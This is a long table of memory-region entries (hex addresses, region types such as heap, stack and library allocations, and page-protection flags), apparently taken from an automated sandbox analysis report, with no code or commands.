|
trusted library allocation
|
page read and write
|
||
A2DC000
|
heap
|
page read and write
|
||
5F5A000
|
heap
|
page read and write
|
||
5F84000
|
heap
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
8EF4000
|
trusted library allocation
|
page read and write
|
||
609D000
|
heap
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
5F21000
|
heap
|
page read and write
|
||
A853000
|
heap
|
page read and write
|
||
A30A000
|
heap
|
page read and write
|
||
5634000
|
trusted library allocation
|
page read and write
|
||
A760000
|
heap
|
page read and write
|
||
798F000
|
stack
|
page read and write
|
||
45BF000
|
heap
|
page read and write
|
||
4F00000
|
trusted library allocation
|
page execute and read and write
|
||
5F75000
|
heap
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
6F8E000
|
stack
|
page read and write
|
||
5F5A000
|
heap
|
page read and write
|
||
5F5C000
|
heap
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
DFE1000
|
trusted library allocation
|
page read and write
|
||
B320000
|
heap
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
608B000
|
heap
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
A362000
|
heap
|
page read and write
|
||
AD08000
|
trusted library allocation
|
page read and write
|
||
4F10000
|
trusted library allocation
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
5F84000
|
heap
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
3450000
|
trusted library allocation
|
page read and write
|
||
5371000
|
trusted library allocation
|
page read and write
|
||
6F0E000
|
stack
|
page read and write
|
||
89C8000
|
trusted library allocation
|
page read and write
|
||
7BF0000
|
trusted library allocation
|
page execute and read and write
|
||
6055000
|
heap
|
page read and write
|
||
E0F000
|
heap
|
page read and write
|
||
54C8000
|
trusted library allocation
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
B0A6000
|
trusted library allocation
|
page read and write
|
||
A3CE000
|
heap
|
page read and write
|
||
577C000
|
trusted library allocation
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
5776000
|
trusted library allocation
|
page read and write
|
||
8AD0000
|
trusted library allocation
|
page read and write
|
||
79A0000
|
trusted library allocation
|
page read and write
|
||
A7B5000
|
heap
|
page read and write
|
||
30CE000
|
stack
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
7AB0000
|
trusted library allocation
|
page read and write
|
||
5F5A000
|
heap
|
page read and write
|
||
A46F000
|
heap
|
page read and write
|
||
5F5A000
|
heap
|
page read and write
|
||
AEA0000
|
trusted library allocation
|
page read and write
|
||
9520000
|
trusted library allocation
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
28CB000
|
heap
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
AEC1000
|
trusted library allocation
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
7B91000
|
heap
|
page read and write
|
||
5F59000
|
heap
|
page read and write
|
||
5F59000
|
heap
|
page read and write
|
||
5E19000
|
trusted library allocation
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
75A3000
|
heap
|
page read and write
|
||
286D000
|
heap
|
page read and write
|
||
AEEB000
|
trusted library allocation
|
page read and write
|
||
5F84000
|
heap
|
page read and write
|
||
60CC000
|
heap
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
78C0000
|
trusted library allocation
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
4D7D000
|
trusted library allocation
|
page execute and read and write
|
||
5F83000
|
heap
|
page read and write
|
||
60F1000
|
heap
|
page read and write
|
||
B54C000
|
stack
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
288A000
|
heap
|
page read and write
|
||
4E50000
|
trusted library allocation
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
610F000
|
heap
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
4D70000
|
trusted library allocation
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
45C8000
|
heap
|
page read and write
|
||
A484000
|
heap
|
page read and write
|
||
60CE000
|
heap
|
page read and write
|
||
6074000
|
heap
|
page read and write
|
||
6F4E000
|
stack
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
5F49000
|
heap
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
AEF4000
|
trusted library allocation
|
page read and write
|
||
5F5A000
|
heap
|
page read and write
|
||
B040000
|
trusted library allocation
|
page read and write
|
||
4C03000
|
trusted library allocation
|
page execute and read and write
|
||
5F59000
|
heap
|
page read and write
|
||
608B000
|
heap
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
5F59000
|
heap
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
26FE000
|
stack
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
5F59000
|
heap
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
A9AB000
|
heap
|
page read and write
|
||
4742000
|
trusted library allocation
|
page read and write
|
||
761F000
|
heap
|
page read and write
|
||
AD4E000
|
trusted library allocation
|
page read and write
|
||
77D0000
|
trusted library allocation
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
75BC000
|
heap
|
page read and write
|
||
5F80000
|
heap
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
5F78000
|
heap
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
60F1000
|
heap
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
A3BB000
|
heap
|
page read and write
|
||
4E40000
|
heap
|
page readonly
|
||
5F83000
|
heap
|
page read and write
|
||
7B27000
|
heap
|
page read and write
|
||
A34B000
|
heap
|
page read and write
|
||
7900000
|
trusted library allocation
|
page read and write
|
||
5F59000
|
heap
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
5F59000
|
heap
|
page read and write
|
||
5F5C000
|
heap
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
5F5C000
|
heap
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
A96A000
|
heap
|
page read and write
|
||
2FC8000
|
stack
|
page read and write
|
||
5F5A000
|
heap
|
page read and write
|
||
4DB0000
|
trusted library allocation
|
page read and write
|
||
AFE0000
|
trusted library allocation
|
page read and write
|
||
5F54000
|
heap
|
page read and write
|
||
7E30000
|
trusted library allocation
|
page read and write
|
||
77C0000
|
trusted library allocation
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
4D82000
|
trusted library allocation
|
page read and write
|
||
7B17000
|
heap
|
page read and write
|
||
5F4D000
|
heap
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
5F5A000
|
heap
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
4C04000
|
trusted library allocation
|
page read and write
|
||
27E3000
|
heap
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
34C4000
|
trusted library allocation
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
83D0000
|
trusted library allocation
|
page read and write
|
||
5F84000
|
heap
|
page read and write
|
||
45B4000
|
heap
|
page read and write
|
||
5F59000
|
heap
|
page read and write
|
||
563D000
|
trusted library allocation
|
page read and write
|
||
285C000
|
heap
|
page read and write
|
||
6024000
|
heap
|
page read and write
|
||
A320000
|
heap
|
page read and write
|
||
B03C000
|
trusted library allocation
|
page read and write
|
||
A75E000
|
heap
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
5F5C000
|
heap
|
page read and write
|
||
5F5A000
|
heap
|
page read and write
|
||
70CE000
|
stack
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
5F59000
|
heap
|
page read and write
|
||
A2CB000
|
heap
|
page read and write
|
||
27D7000
|
heap
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
29CD000
|
stack
|
page read and write
|
||
AD05000
|
trusted library allocation
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
6074000
|
heap
|
page read and write
|
||
A763000
|
heap
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
605C000
|
heap
|
page read and write
|
||
4C30000
|
trusted library allocation
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
728B000
|
stack
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
6076000
|
heap
|
page read and write
|
||
A3B6000
|
heap
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
7800000
|
trusted library allocation
|
page execute and read and write
|
||
83B0000
|
trusted library allocation
|
page read and write
|
||
4CCE000
|
stack
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
564B000
|
trusted library allocation
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
73AF000
|
stack
|
page read and write
|
||
75E2000
|
heap
|
page read and write
|
||
7DB0000
|
trusted library allocation
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
AE58000
|
trusted library allocation
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
285C000
|
heap
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
60A4000
|
heap
|
page read and write
|
||
6024000
|
heap
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
2887000
|
heap
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
A3CE000
|
heap
|
page read and write
|
||
848E000
|
stack
|
page read and write
|
||
2851000
|
heap
|
page read and write
|
||
7990000
|
trusted library allocation
|
page read and write
|
||
7DB5000
|
trusted library allocation
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
607E000
|
heap
|
page read and write
|
||
5F80000
|
heap
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
5F84000
|
heap
|
page read and write
|
||
5480000
|
heap
|
page read and write
|
||
7C21000
|
trusted library allocation
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
A88C000
|
heap
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
5F5A000
|
heap
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
607B000
|
heap
|
page read and write
|
||
A32F000
|
heap
|
page read and write
|
||
9480000
|
trusted library allocation
|
page read and write
|
||
60F4000
|
heap
|
page read and write
|
||
5F59000
|
heap
|
page read and write
|
||
A2C4000
|
heap
|
page read and write
|
||
A2CB000
|
heap
|
page read and write
|
||
60DE000
|
heap
|
page read and write
|
||
3400000
|
trusted library allocation
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
AEE9000
|
trusted library allocation
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
B550000
|
heap
|
page read and write
|
||
A416000
|
heap
|
page read and write
|
||
AD3C000
|
trusted library allocation
|
page read and write
|
||
AD05000
|
trusted library allocation
|
page read and write
|
||
AEC1000
|
trusted library allocation
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
605C000
|
heap
|
page read and write
|
||
5E7D000
|
trusted library allocation
|
page read and write
|
||
5F56000
|
heap
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
4D95000
|
trusted library allocation
|
page execute and read and write
|
||
651C000
|
trusted library allocation
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
8F2D000
|
trusted library allocation
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
5F59000
|
heap
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
3490000
|
trusted library section
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
4D18000
|
trusted library allocation
|
page read and write
|
||
7910000
|
trusted library allocation
|
page read and write
|
||
A760000
|
heap
|
page read and write
|
||
30F8000
|
heap
|
page read and write
|
||
2844000
|
heap
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
607E000
|
heap
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
4C0D000
|
trusted library allocation
|
page execute and read and write
|
||
4D79000
|
trusted library allocation
|
page read and write
|
||
2F8C000
|
stack
|
page read and write
|
||
5385000
|
trusted library allocation
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
288D000
|
heap
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
45E7000
|
heap
|
page read and write
|
||
45B6000
|
heap
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
6371000
|
trusted library allocation
|
page read and write
|
||
60DF000
|
heap
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
714E000
|
stack
|
page read and write
|
||
4838000
|
trusted library allocation
|
page read and write
|
||
AEE9000
|
trusted library allocation
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
288D000
|
heap
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
4C19000
|
trusted library allocation
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
47CE000
|
trusted library allocation
|
page read and write
|
||
605B000
|
heap
|
page read and write
|
||
4F27000
|
heap
|
page read and write
|
||
AEEC000
|
trusted library allocation
|
page read and write
|
||
7DC0000
|
trusted library allocation
|
page read and write
|
||
A2A8000
|
heap
|
page read and write
|
||
537D000
|
trusted library allocation
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
7DF0000
|
trusted library allocation
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
AEED000
|
trusted library allocation
|
page read and write
|
||
A69F000
|
heap
|
page read and write
|
||
B0A6000
|
trusted library allocation
|
page read and write
|
||
5DD0000
|
remote allocation
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
286D000
|
heap
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
77EE000
|
stack
|
page read and write
|
||
2ACE000
|
stack
|
page read and write
|
||
5F4A000
|
heap
|
page read and write
|
||
78D0000
|
trusted library allocation
|
page execute and read and write
|
||
5F80000
|
heap
|
page read and write
|
||
6076000
|
heap
|
page read and write
|
||
4DAE000
|
stack
|
page read and write
|
||
7C40000
|
trusted library allocation
|
page read and write
|
||
5F73000
|
heap
|
page read and write
|
||
63DD000
|
trusted library allocation
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
5F5A000
|
heap
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
602B000
|
heap
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
7740000
|
trusted library allocation
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
5F59000
|
heap
|
page read and write
|
||
5F59000
|
heap
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
A7AC000
|
heap
|
page read and write
|
||
5F69000
|
heap
|
page read and write
|
||
A630000
|
heap
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
46B0000
|
heap
|
page read and write
|
||
7E9B000
|
stack
|
page read and write
|
||
5F5A000
|
heap
|
page read and write
|
||
3430000
|
trusted library allocation
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
5F5A000
|
heap
|
page read and write
|
||
4800000
|
trusted library allocation
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
A9AB000
|
heap
|
page read and write
|
||
5F59000
|
heap
|
page read and write
|
||
A9AB000
|
heap
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
AD36000
|
trusted library allocation
|
page read and write
|
||
5F54000
|
heap
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
9582000
|
trusted library allocation
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
762C000
|
heap
|
page read and write
|
||
606B000
|
heap
|
page read and write
|
||
A673000
|
heap
|
page read and write
|
||
605B000
|
heap
|
page read and write
|
||
7530000
|
heap
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
8910000
|
heap
|
page read and write
|
||
7750000
|
trusted library allocation
|
page read and write
|
||
5F5A000
|
heap
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
680000
|
heap
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
A730000
|
heap
|
page read and write
|
||
7610000
|
heap
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
288D000
|
heap
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
89C5000
|
trusted library allocation
|
page read and write
|
||
608B000
|
heap
|
page read and write
|
||
5F5C000
|
heap
|
page read and write
|
||
5E39000
|
trusted library allocation
|
page read and write
|
||
6E8E000
|
stack
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
D20000
|
heap
|
page read and write
|
||
A411000
|
heap
|
page read and write
|
||
282C000
|
heap
|
page read and write
|
||
4D90000
|
trusted library allocation
|
page read and write
|
||
947C000
|
trusted library allocation
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
4F20000
|
heap
|
page read and write
|
||
5F5A000
|
heap
|
page read and write
|
||
83E0000
|
trusted library allocation
|
page read and write
|
||
A312000
|
heap
|
page read and write
|
||
45C8000
|
heap
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
8F4D000
|
trusted library allocation
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
606F000
|
heap
|
page read and write
|
||
7E00000
|
trusted library allocation
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
519E000
|
stack
|
page read and write
|
||
5F5A000
|
heap
|
page read and write
|
||
301F000
|
stack
|
page read and write
|
||
4EEF000
|
stack
|
page read and write
|
||
4E11000
|
trusted library allocation
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
5F5D000
|
heap
|
page read and write
|
||
8940000
|
trusted library allocation
|
page read and write
|
||
74BE000
|
stack
|
page read and write
|
||
5F59000
|
heap
|
page read and write
|
||
A333000
|
heap
|
page read and write
|
||
AD4E000
|
trusted library allocation
|
page read and write
|
||
89C0000
|
trusted library allocation
|
page read and write
|
||
7AD3000
|
heap
|
page read and write
|
||
4778000
|
trusted library allocation
|
page read and write
|
||
A2E3000
|
heap
|
page read and write
|
||
A2ED000
|
heap
|
page read and write
|
||
5F63000
|
heap
|
page read and write
|
||
890E000
|
stack
|
page read and write
|
||
8850000
|
trusted library allocation
|
page read and write
|
||
5F84000
|
heap
|
page read and write
|
||
77E0000
|
trusted library allocation
|
page execute and read and write
|
||
5F75000
|
heap
|
page read and write
|
||
5F59000
|
heap
|
page read and write
|
||
5F79000
|
heap
|
page read and write
|
||
4C32000
|
trusted library allocation
|
page read and write
|
||
4C80000
|
heap
|
page execute and read and write
|
||
7920000
|
trusted library allocation
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
A689000
|
heap
|
page read and write
|
||
75AB000
|
heap
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
5F5A000
|
heap
|
page read and write
|
||
A458000
|
heap
|
page read and write
|
||
A3A4000
|
heap
|
page read and write
|
||
A2D7000
|
heap
|
page read and write
|
||
605C000
|
heap
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
710E000
|
stack
|
page read and write
|
||
A88B000
|
heap
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
5F6A000
|
heap
|
page read and write
|
||
A2C3000
|
heap
|
page read and write
|
||
602D000
|
heap
|
page read and write
|
||
5F78000
|
heap
|
page read and write
|
||
5F5A000
|
heap
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
607E000
|
heap
|
page read and write
|
||
5F5A000
|
heap
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
3080000
|
heap
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
71CE000
|
stack
|
page read and write
|
||
2846000
|
heap
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
8C7E000
|
stack
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
AEE9000
|
trusted library allocation
|
page read and write
|
||
5F84000
|
heap
|
page read and write
|
||
A80C000
|
heap
|
page read and write
|
||
43A000
|
stack
|
page read and write
|
||
A46F000
|
heap
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
AEE9000
|
trusted library allocation
|
page read and write
|
||
33F0000
|
heap
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
720D000
|
stack
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
5F5A000
|
heap
|
page read and write
|
||
7AB7000
|
trusted library allocation
|
page read and write
|
||
47A0000
|
trusted library allocation
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
6061000
|
heap
|
page read and write
|
||
5F54000
|
heap
|
page read and write
|
||
6020000
|
heap
|
page read and write
|
||
3420000
|
trusted library allocation
|
page execute and read and write
|
||
75D4000
|
heap
|
page read and write
|
||
5F8A000
|
heap
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
B020000
|
trusted library allocation
|
page read and write
|
||
5F5A000
|
heap
|
page read and write
|
||
ADF0000
|
trusted library allocation
|
page read and write
|
||
53D6000
|
trusted library allocation
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
EFE1000
|
trusted library allocation
|
page read and write
|
||
5F84000
|
heap
|
page read and write
|
||
B0A6000
|
trusted library allocation
|
page read and write
|
There are 1535 hidden memdumps, click here to show them.